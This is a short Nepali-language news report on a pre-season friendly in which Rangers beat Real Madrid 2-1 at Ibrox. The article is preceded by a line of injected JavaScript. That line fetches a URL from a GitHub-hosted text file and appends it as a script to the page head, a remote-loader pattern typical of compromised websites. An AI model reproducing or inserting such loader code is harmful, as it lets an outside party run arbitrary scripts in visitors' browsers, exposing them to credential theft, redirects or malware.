;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
११ साउन, काठमाडौं । प्रि-सिजन अन्तर्गत मैत्रीपूर्ण खेलमा स्पानिस क्लब रियल मड्रिड स्कटिस क्लब रेन्जर्ससँग पराजित भएको छ ।
आइतबार राति भएको खेलमा सुरुआती अग्रता लिएपनि रियल रेन्जर्ससँग २-१ ले पराजित भएको हो ।
आइब्रोक्स स्टेडियममा भएकाे खेलको आठौं मिनेटमा रोड्रिगोले गोल गर्दै रियललाई अग्रता दिलाएका थिए ।
पहिलाे हाफमा रियलले अग्रता लिएपनि दाेस्राे हाफमा रेन्जर्सले पुनरागमन गर्यो ।५५औं मिनेटमा फाशीन साकलाले रेन्जर्सका लागि बराबरी गाेल फर्काए ।
७६औं मिनेटमा नाचो फर्नान्डेज दोहोरो पहेलो कार्ड पाउँदै मैदान बाहिरिएपछि रियल १० खेलाडीमा समेटियो ।
त्यसपछि ७७ औं मिनेटमा सेड्रिक इटेनले गोल गर्दै रेन्जर्सलाई २-१ को जित दिलाए
फेसबुक प्रतिक्रियाहरु